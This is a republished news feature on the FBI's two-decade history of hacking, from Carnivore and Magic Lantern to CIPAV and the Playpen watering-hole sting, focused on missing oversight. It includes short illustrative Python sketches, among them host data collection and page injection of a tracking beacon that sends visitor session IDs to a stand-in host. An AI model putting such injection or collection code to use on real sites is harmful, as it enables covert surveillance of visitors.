Portside aims to provide varied material of interest to people on the left that will help them to interpret the world, and to change it.
Recent headlines warn that the government now has greater authority to hack your computers, in and outside the US. Changes to federal criminal court procedures known as Rule 41 are to blame; they vastly expand how and whom the FBI can legally hack. But just like the NSA’s hacking operations, FBI hacking isn’t new. In fact, the bureau has a long history of surreptitiously hacking us, going back two decades.
That history is almost impossible to document, however, because the hacking happens mostly in secret. Search warrants granting permission to hack get issued using vague, obtuse language that hides what’s really happening, and defense attorneys rarely challenge the hacking tools and techniques in court. There’s also no public accounting of how often the government hacks people. Although federal and state judges have to submit a report to Congress tracking the number and nature of wiretap requests they process each year, no similar requirement exists for hacking tools. As a result, little is known about the invasive tools the bureau, and other law enforcement agencies, use or how they use them. But occasionally, tidbits of information do leak out in court cases and news stories.
A look at a few of these cases offers a glimpse at how FBI computer intrusion techniques have developed over the years. Note that the government takes issue with the word “hacking,” since this implies unauthorized access, and the government’s hacking is court-sanctioned. Instead it prefers the terms “remote access searches” and Network Investigative Techniques, or NITs. By whatever name, however, the activity is growing.
The FBI’s first known computer surveillance tool was a traffic sniffer named Carnivore that got installed on network backbones—with the permission of internet service providers. The unfortunately named tool was custom-built to filter and copy metadata and/or the content of communications to and from a surveillance target. By the time the public learned about the tool in 2000, after Earthlink refused to let the FBI install it on its network, the government had already used it about 25 times, beginning in 1998. Earthlink feared the sniffer would give the feds unfettered access to all customer communications. A court battle and congressional hearing ensued, sparking a fierce and divisive debate that made Carnivore the Apple/FBI case of its day.
The FBI insisted to Congress that its precision filters prevented anything but the target’s communications from being collected. But Carnivore’s descriptive name seemed to defy that, and an independent review ultimately found that the system was “capable of broad sweeps” if incorrectly configured. The reviewers also found that Carnivore lacked both the protections to prevent someone from configuring it this way and the capability to track who did it if the configuration got changed.
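How a sniffer of this sort narrows a full traffic feed down to one target is straightforward to sketch. The Python fragment below is an illustration only, not Carnivore itself (whose code was never released): a pen-register-style filter that copies metadata, and no payload, for packets to or from a single target address. The packet format and all names are invented for the example.

```python
# Illustrative sketch of pen-register-style filtering, loosely in the
# spirit of what the FBI described Carnivore doing. NOT the real tool:
# the packet format and all names are invented for this example.

def filter_for_target(packets, target_ip):
    """Keep metadata-only records for packets to or from target_ip."""
    records = []
    for pkt in packets:
        if target_ip in (pkt["src"], pkt["dst"]):
            # Copy metadata only -- no payload -- mimicking the mode
            # in which the FBI said the tool was normally configured.
            records.append({
                "src": pkt["src"],
                "dst": pkt["dst"],
                "timestamp": pkt["timestamp"],
                "bytes": len(pkt["payload"]),
            })
    return records

# A toy traffic feed: only the first and third packets involve the target.
traffic = [
    {"src": "10.0.0.5", "dst": "10.0.0.9", "timestamp": 1, "payload": b"hello"},
    {"src": "10.0.0.7", "dst": "10.0.0.8", "timestamp": 2, "payload": b"unrelated"},
    {"src": "10.0.0.9", "dst": "10.0.0.5", "timestamp": 3, "payload": b"reply"},
]
captured = filter_for_target(traffic, "10.0.0.5")
```

The reviewers’ finding makes sense in these terms: loosen or remove the `target_ip` check and the same loop sweeps up everyone’s traffic, which is why configuration controls and audit logging mattered so much.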
By 2005, the FBI had replaced Carnivore with commercial filters, but was still using other custom-built collection tools in the Carnivore family. But all of these network surveillance tools had one problem, the same issue plaguing law enforcement agencies today: encryption. FBI agents could use tools to siphon all the data they wanted as it crossed various networks, but if the data was encrypted, they couldn’t read it.
Enter key loggers designed to circumvent encryption by capturing keystrokes as a surveillance target typed, before encryption kicked in.
In 1999, Cosa Nostra mob boss Nicodemo Salvatore Scarfo, Jr., became the first criminal suspect known to be targeted by a government keystroke logger. Scarfo was using encryption to protect his communications, and the FBI used a key logger—which was likely a commercially made tool—to capture his PGP encryption key. Unlike key loggers today, which can be installed remotely, this one required the FBI to physically break into Scarfo’s office twice: once to install the logger on his computer and once to retrieve it, since Scarfo was using a dial-up internet connection that prevented authorities from reaching his computer remotely.
The FBI apparently went rogue in using the tool, however, because a government memo from 2002 (.pdf) recently obtained by MIT national security researcher Ryan Shapiro revealed that the Justice Department was irked that the Bureau had “risked a classified technique on an unworth [sic] target.”
Scarfo challenged the surveillance, arguing in a motion that the feds needed a wiretap order to capture the content of his communications and that a search warrant was insufficient. His lawyers sought information about the keylogger, but the government insisted the technology—which was already being used in the wild by hackers—was classified for national security reasons. It’s one of the same excuses the government uses today to keep a veil over its surveillance tools and techniques.
The Scarfo case evidently convinced the feds that they needed to develop their own custom hacking tools, and in 2001, reporters got wind of Magic Lantern, the code name for an FBI keylogger that apparently went beyond what the government had used against Scarfo, since this one could be installed remotely. (A former lawyer for Scarfo who has asked to remain anonymous says Magic Lantern was not the tool used on the mob boss, though he doesn’t know the name of the tool that was.)
In addition to keystrokes, this new tool also recorded web browsing history and usernames and passwords, and listed all the internet-facing ports open on a machine. It may have been used for the first time in Operation Trail Mix, an investigation of an animal rights group that occurred in 2002 and 2003. As recently revealed by the New York Times, the FBI used a tool to get around the encryption one suspect in the case was using; although the tool was never identified in court documents, it’s believed to have been a keystroke logger. “This was the first time that the Department of Justice had ever approved such an intercept of this type,” an FBI agent wrote about the tool in a 2005 email obtained by Shapiro this year.
After the news about Magic Lantern leaked in 2001, the government managed to keep a tight lid on its hacking tools and techniques for nearly a decade.
In 2009, the public finally got a more comprehensive view of FBI hacking when WIRED obtained a cache of government documents through a FOIA request. The documents described a surveillance tool called CIPAV—Computer and Internet Protocol Address Verifier—designed to collect a computer’s IP and MAC address, an inventory of all open ports and software installed on the machine, as well as registry information, the username of anyone logged in and the last URL visited by the machine. All of this data got sent to the FBI over the internet. CIPAV apparently didn’t come with a keystroke logger, however, and didn’t collect the contents of communication. Many in the security community believe that CIPAV, which has been around for at least as long as Magic Lantern and is still used today, is Magic Lantern by another name, minus the keystroke logger component.
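For a sense of how little code this category of collection requires, here is a hedged sketch of a one-shot system inventory gathering a few of the same kinds of items CIPAV reportedly collected. The real tool is closed source, so everything here — the function name, the fields, the use of Python’s standard library — is an assumption for illustration, and this version gathers only benign local facts.

```python
# Hypothetical sketch of a one-shot system inventory, illustrating the
# *kind* of data a tool like CIPAV reportedly gathered. The real NIT is
# closed source; all names and fields here are invented for the example.
import os
import platform
import socket

def collect_inventory():
    """Gather a small, benign snapshot of identifying machine facts."""
    return {
        "hostname": socket.gethostname(),
        # Fall back across common environment variables for the user name.
        "username": os.environ.get("USER") or os.environ.get("USERNAME") or "unknown",
        "os": platform.system(),
        "os_version": platform.release(),
    }

inventory = collect_inventory()
```

A real NIT would also have to exfiltrate this snapshot to a collection server over the internet, which is the step that turns a local inventory into surveillance.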
The tool helped identify an extortionist in 2004 who was cutting phone and internet cables and demanding money from telecoms to stop. In 2007 it was used to unmask a teen who was e-mailing bomb threats to a high school in Washington state. And it’s been used in various other cases, ranging from hacker investigations to terrorism and foreign spying cases, all for the primary purpose of unmasking the IP address of targets who used anonymizing services to hide their identity and location.
It was apparently so popular that a federal prosecutor complained (.pdf) in 2002 that it was being used too much. “While the technique is of indisputable value in certain kinds of cases,” he wrote, “we are seeing indications that it is being used needlessly by some agencies, unnecessarily raising difficult legal questions (and a risk of suppression) without any countervailing benefit.” In other words, the more it got used, the more likely defense attorneys would learn about it and file legal objections to throw out evidence collected with it.
But hacking surveillance targets one at a time is too time-consuming when a crime involves many suspects. So in 2012 the government borrowed a favorite trick of the criminal hacker trade: drive-by downloads, also known as watering hole attacks. These involve embedding spyware on a website where criminal suspects congregate, so the computers of all visitors to the site get infected. It has become a favorite government tactic for unmasking visitors to child porn sites hosted with Tor Hidden Services, sites that can be accessed only with the Tor anonymizing browser, which conceals a user’s real IP address. To infect suspects’ machines, the feds first gain control of the servers hosting the sites, then embed their spyware in one of the site’s pages.
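The injection step itself can be reduced to a very small sketch. The snippet below is purely illustrative: real NITs exploited browser vulnerabilities rather than serving a simple tracking image, and the beacon URL, page content, and function names here are all hypothetical.

```python
# Abstract illustration of watering-hole injection: a server under the
# operator's control serves the site's normal pages with one extra
# element added, so every visitor's browser fetches it. Purely
# hypothetical; real NITs exploited browser flaws, not <img> beacons.

BEACON = '<img src="http://beacon.example/nit?session={sid}" width="1" height="1">'

def inject_beacon(page_html, session_id):
    """Insert a per-visitor beacon just before the closing body tag."""
    return page_html.replace("</body>", BEACON.format(sid=session_id) + "</body>")

page = "<html><body><p>forum post</p></body></html>"
served = inject_beacon(page, "abc123")
```

The point of the design is that the visitor does nothing unusual: simply loading a page they already intended to visit is enough to make their browser reach out and reveal their real network location.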
They apparently used a watering hole attack for the first time in Operation Torpedo, a sting operation aimed at unmasking anonymous visitors to three child porn sites hosted on servers in Nebraska in 2012.
The FBI and international partners used a similar tactic last year to target more than 4,000 machines belonging to members and would-be members of the child porn site Playpen. The FBI, for its part, identified the real IP addresses of some 1,300 Playpen visitors, of whom about 137 have been charged with crimes.
For all that we now know about government hacking, there’s so much more that we still don’t know. For example, what exactly is the government doing with these tools? Are they just grabbing IP addresses and information from a computer’s registry? Or are they doing more invasive things—like activating the webcam to take pictures of anyone using a targeted machine, as they sought to do in a 2013 case? How are the tools tested to make sure they don’t damage the machines they infect? The latter is particularly important if the government installs any tool on the machines of botnet victims, as the recent Rule 41 changes suggest they might do.
Do investigators always obtain a search warrant to use the tools? If yes, do the spy tools remain on systems after the term of the search warrant ends or do the tools self-delete on a specified date? Or do the tools require law enforcement to send a kill command to disable and erase them? How often does the government use zero-day vulnerabilities and exploits to covertly slip their spyware onto systems? And how long do they withhold information about those vulnerabilities from software vendors so they can be exploited instead of patched?
The Justice Department has long insisted that its hacking operations are legal, done with search warrants and court supervision. But even operations done with court approval can raise serious questions. The case in 2007 of the teen who sent bomb threats is one example. In order to infect the teenage suspect’s computer, the FBI tricked him into downloading the spy tool by posting a malicious link (.pdf) to the private chat room of a MySpace account the teen controlled. The link was for a bogus Associated Press article purporting to be about the bomb threats.
The FBI didn’t disclose in its warrant affidavit that it planned to lure the suspect with a news article; that only came to light in FBI emails later obtained by the Electronic Frontier Foundation. The AP accused the feds of undermining its credibility and putting AP journalists and other newsgatherers around the world in danger by giving the appearance that the media outlet had worked in collusion with the government. There was another problem with the tactic: the potential spread of the malware. “The FBI may have intended this false story as a trap for only one person,” the AP added, in a letter to the Justice Department. “However, the individual could easily have reposted this story to social networks, distributing to thousands of people, under our name, what was essentially a piece of government disinformation.”
And then there’s the recent Playpen sting, where for the two weeks the operation continued, the government allowed people visiting the site to download and share thousands of exploitive images and videos of toddlers and pre-teens, further victimizing the children and infants in those images.
“The public might want to know, how did the FBI figure out where on balance it’s worth it to run a child porn web site for two weeks, given some of what’s involved in the covert operations will essentially permit more child porn to be distributed. Someone has to make [those] calculations,” says Elizabeth Joh, a University of California Davis law professor who writes extensively about policing, technology and surveillance. “But we don’t know how that calculation is made.”
It’s not clear if Congress knows either.
Questions about how much law enforcement can participate in criminal behavior and disguise their identity in covert operations are not new in the offline world. “But there’s more urgency now because of the ways in which [online investigations] are becoming more complex, and we continue to have very little oversight,” she says. “What sort of oversight should there be when the FBI decides to impersonate real people, real institutions—particularly the media—and when it actually participates in the very illegal activity that it’s trying to stop? Should we really leave law enforcement to police themselves? That’s the question.”